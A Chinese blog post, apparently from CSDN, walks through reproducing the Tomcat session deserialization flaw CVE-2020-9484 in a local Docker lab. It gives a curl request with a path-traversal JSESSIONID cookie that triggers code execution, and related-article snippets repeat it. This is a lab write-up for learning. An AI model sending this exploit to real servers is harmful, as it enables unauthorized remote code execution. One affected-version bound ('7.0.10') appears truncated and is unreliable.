Tomcat Session(CVE-2020-9484)反序列化漏洞复现

最新推荐文章于 2024-04-12 09:50:46 发布
最新推荐文章于 2024-04-12 09:50:46 发布
阅读量1.7k 收藏 2
点赞数 1
分类专栏: 漏洞复现 文章标签: tomcat docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yzl_007/article/details/119969373
版权

Tomcat Session(CVE-2020-9484)反序列化漏洞复现

漏洞概述

Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。 成功利用此漏洞需要同时满足以下4个条件: 1.攻击者能够控制服务器上文件的内容和文件名称; 2.服务器PersistenceManager配置中使用了FileStore; 3.PersistenceManager中的sessionAttributeValueClassNameFilter被配置为“null”,或者过滤器不够严格,导致允许攻击者提供反序列化数据的对象; 4.攻击者知道使用的FileStore存储位置到攻击者可控文件的相对路径

漏洞分析

参考:https://www.freebuf.com/vuls/245232.html

影响版本

  • Apache Tomcat : 10.0.0-M1 to 10.0.0-M4
  • Apache Tomcat : 9.0.0.M1 to 9.0.34
  • Apache Tomcat : 8.5.0 to 8.5.54
  • Apache Tomcat : 7.0.0 to 7.0.10

环境搭建

这里使用docker搭建

git clone https://github.com/masahiro331/CVE-2020-9484.git

image-20210828154206213

有几次无法访问的情况,网络没问题的话多重试几次就好了

image-20210828154250536

环境安装

docker build -t tomcat:groovy . (这里有一个点),然后等待安装好

image-20210828154446001

环境启动

docker run -d -p 8080:8080 tomcat:groovy

image-20210828154827149

访问8080端口

image-20210828154926236

复现过程

curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy'

image-20210828155718061

进入容器

docker exec -it 容器id /bin/bash

检查/tmp/rce进行验证

image-20210828160220037

证明漏洞存在

yyyyzzzllll
关注
专栏目录
CVE-2020-9484 Tomcat Session 反序列化复现
weixin_45260839的博客
07-01 1777
CVE-2020-9484 Tomcat Session 反序列化复现
Tomcat Session(CVE-2020-9484)反序列化
m0_48520508的博客
08-01 1120
0x01简介 Apache Tomcat最早是由Sun Microsystems开发的一个Servlet容器,在1999年被捐献给ASF(Apache Software Foundation),隶属于Jakarta项目,现在已经独立为一个顶级项目。Tomcat主要实现了Java EE中的Servlet、JSP规范,同时也提供HTTP服务,是市场上非常流行的Java Web容器。 Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被
CVE-2020-9484: Apache Tomcat Session 反序列化代码执行漏洞
最新发布
weixin_56306210的博客
04-12 1104
CVE-2020-9484: Apache Tomcat Session 反序列化代码执行漏洞
CVE-2020-9484漏洞复现
RAFANra的博客
04-07 3671
Apache Tomcat 反序列化代码执行漏洞复现(CVE-2020-9484) 1 前言 Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。 当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。 2 漏洞分析 1、攻击者能够控制服务器上文件的内容和文件名
CVE-2020-9484
04-13
CVE-2020-9484Tomcat) 仅用于教育目的。 有关详细信息,请参见参考。 跑步 $ git clone https://github.com/masahiro331/CVE-2020-9484.git $ cd CVE-2020-9484 $ docker build -t tomcat:groovy . $ docker run -d -p 8080:8080 tomcat:groovy 开发 $ curl 'http://127.0.0.1:8080/index.jsp' -H 'Cookie: JSESSIONID=../../../../../usr/local/tomcat/groovy' 查看 $ docker exec -it $CONTAINER /bin/sh $ ls /tmp/rce
java反序列化漏洞 tomcat_Tomcat Session(CVE-2020-9484)反序列化漏洞复现
weixin_42523670的博客
02-16 779
0x01简介Apache Tomcat最早是由Sun Microsystems开发的一个Servlet容器,在1999年被捐献给ASF(Apache Software Foundation),隶属于Jakarta项目,现在已经独立为一个顶级项目。Tomcat主要实现了Java EE中的Servlet、JSP规范,同时也提供HTTP服务,是市场上非常流行的Java Web容器。Tomcat 服务器是...
CVE-2020-9484 tomcat session反序列化漏洞分析
蚁景网安学院
07-08 1164
本文借助CVE-2020-9484 Tomcat漏洞详细的介绍了本地和远程调试Tomcat 源码。分析漏洞成因以及补丁修补情况,以及分析ysoserial反序列化链。0x01 漏洞简介A...
[Timeline Sec] - CVE-2020-9484Tomcat Session 反序列化复现1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介Web应用软件的基于Java的Web应用软件容器。0x02 漏洞概述这次是由于错误配置和 org.apache
CVE-2020-9484.tar
06-02
CVE-2020-9484 tomcat session反序列化漏洞分析与实验环境,配合docker容器,更方便快捷,一键式操作,一键式复现漏洞。你值得拥有。
APACHE OFBIZ XML-RPC 反序列化漏洞 (CVE-2020-9496) 的复现与分析
smellycat000的专栏
12-23 1329
聚焦源代码安全,网罗国内外最新资讯!1.1 状态完成漏洞挖掘条件分析、漏洞复现。1.2 简介相关的重点类和方法:org.apache.xmlrpc.parser.Serializabl...
CVE-2020-9484 (Tomcat cluster sync-session)复现
thelostworld
08-20 1379
CVE-2020-9484 一、漏洞简介 对于一个企业级应用而言,Session对象的管理十分重要。Sessio对象的信息一般情况下置于服务器的内存中,当服务器由于故障重启,或应用重新加载 时候,此时的Session信息将全部丢失。为了避免这样的情况,在某些场合可以将服务器的Session数据存放在文件系统或数据库中,这样的操作称为 Session对象的持久化。Session对象在持久化时,存放在其中的对象以序列化的形式存放,这就是为什么一般存放在Session中的数据需要实 现可序...
Apache #Tomcat CVE-2020-9484
qq_36584013的博客
06-22 909
CVE-2020-9484 用Kali 2.0复现Apache Tomcat Session反序列化代码执行漏洞 CVE-2020-9484 环境: Kali 2.0 apache-tomcat-7.0.61-CVE-2020-9484.tar.gz(webapp是s2-053,在其lib下加了commons-collections4-4.0.jar) 启动 /yourtomcat...
Tomcat Session 反序列化CVE-2020-9484
黑白的博客
11-22 952
声明 好好学习,天天向上 漏洞描述 Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。 由于错误配置和 org.apache.catalina.session.FileStore 的 LFI 和反序列化漏洞引起的 RCE。 当配置了 org.apache.catalina.session.PersistentManager 并且使用 org.apache.catalina.session.FileStore 来储存 session
用友NC的一些漏洞复现
热门推荐
yzl_007的博客
12-15 1万+
用友NC的一些漏洞复现 一、BeanShell Test Servlet命令执行 漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 影响范围:NC 6.5版本 复现过程: 访问对应网站后界面如下: 漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet 后续还可以写shell进去,但是这里不
CVE-2020-9484Tomcat Session 反序列化漏洞复现分析
"CVE-2020-9484是一个关于Apache Tomcat Web服务器的漏洞,主要涉及Session反序列化和本地文件包含(LFI)问题,可能导致远程代码执行(RCE)。此漏洞影响多个Tomcat版本,包括10.0.0-M1至10.0.0-M4,9.0.0.M1至9.0....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值